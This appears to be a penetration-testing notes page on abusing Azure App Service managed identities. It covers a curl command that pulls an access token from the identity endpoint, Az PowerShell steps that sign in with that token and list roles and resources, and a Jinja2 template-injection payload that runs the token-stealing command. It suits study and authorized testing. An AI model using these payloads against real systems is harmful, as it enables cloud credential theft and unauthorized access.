
Azure App Service


Last updated 3 months ago

Azure App Service is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. It supports both Windows and Linux environments.

Isolation

Each app runs inside a sandbox, but the degree of isolation depends on the App Service plan:

  • Apps in the Free and Shared tiers run on shared VMs

  • Apps in the Standard and Premium tiers run on dedicated VMs

App Service Abuse

While App Service ships with default security features (sandboxing/isolation), vulnerabilities in the deployed code are still abusable. The classic web app vulns like SQL injection, OS command injection, etc. do not disappear.

Managed Identity

If a vulnerability in an app service gives command execution, that execution runs with the privileges of the low-privilege worker process. But if the app service uses a Managed Identity, that identity may hold interesting permissions on other Azure resources.

Once you have command execution, run env to check whether the IDENTITY_HEADER and IDENTITY_ENDPOINT variables are set. If they are, the app has a managed identity.

Now, to get an access_token for the app service, we can use the following command:

curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

Check App Privileges

Once you have an access_token for the app service, use it to sign in with Connect-AzAccount (Az PowerShell):

Connect-AzAccount -AccessToken $token -AccountID 064aaf57-30af-41f0-840a-xxxxx

Now, to check which role assignments our token has, run:

Get-AzRoleAssignment

To get the available resources run:

Get-AzResource
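Before running the role-assignment checks above it helps to know exactly which identity the token represents and what it is scoped to. The following Python is an added example, not part of the original notes: it parses the JSON the identity endpoint returns and summarises the token's claims (object id, client id, audience, time to expiry). The response and the JWT inside it are constructed sample data with made-up ids and a placeholder signature.

```python
import base64
import json
import time

def _b64url(obj):
    """base64url-encode a JSON object without padding (JWT convention)."""
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

# Constructed sample claims, shaped like an ARM token issued to a managed identity.
# All ids are made up; the expiry is 2100-01-01 so the sample stays "valid".
SAMPLE_CLAIMS = {
    "aud": "https://management.azure.com/",
    "exp": 4102444800,
    "appid": "11111111-1111-1111-1111-111111111111",
    "oid": "22222222-2222-2222-2222-222222222222",
    "idtyp": "app",
}

# Constructed sample of the JSON the identity endpoint returns; the signature
# segment is a placeholder, so this token is unsigned and unusable anywhere.
SAMPLE_RESPONSE = json.dumps({
    "access_token": ".".join([_b64url({"alg": "RS256", "typ": "JWT"}),
                              _b64url(SAMPLE_CLAIMS), "placeholder-signature"]),
    "expires_on": "4102444800",
    "resource": "https://management.azure.com/",
    "token_type": "Bearer",
})

def decode_jwt_claims(token):
    """Return a JWT's payload claims WITHOUT signature verification (inspection only)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS/JWT")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))

def summarize_identity_token(response_json, now=None):
    """Describe whose token this is and what it is scoped to."""
    claims = decode_jwt_claims(json.loads(response_json)["access_token"])
    now = time.time() if now is None else now
    return {
        "principal_object_id": claims.get("oid"),   # object id of the managed identity
        "app_id": claims.get("appid"),              # client id: what -AccountId expects
        "audience": claims.get("aud"),
        "is_arm_token": claims.get("aud", "").rstrip("/") == "https://management.azure.com",
        "is_app_identity": claims.get("idtyp") == "app",
        "seconds_until_expiry": int(claims["exp"] - now),
    }
```

The summary tells you which principal Get-AzRoleAssignment is going to report on, and whether the token is an ARM token at all (a token minted for another resource URL will not work against management.azure.com).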

SSTI payload

If you find an app vulnerable to SSTI (Jinja2), use this payload to get the app's access_token:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER').read() }}

Function App

A function app (also called Azure Functions) is Azure's 'serverless' solution for running code. A function app is meant to react to an event such as:

  • An HTTP trigger

  • Processing a file upload

  • Running code on a schedule, and more

Function apps also support managed identities!

It looks a lot like AWS Lambda.

When you get the following error, it means the access_token has no access to any resources:

By default, managed identities (service principals), have no read access at all!

In this case, something like AzureHound comes in handy.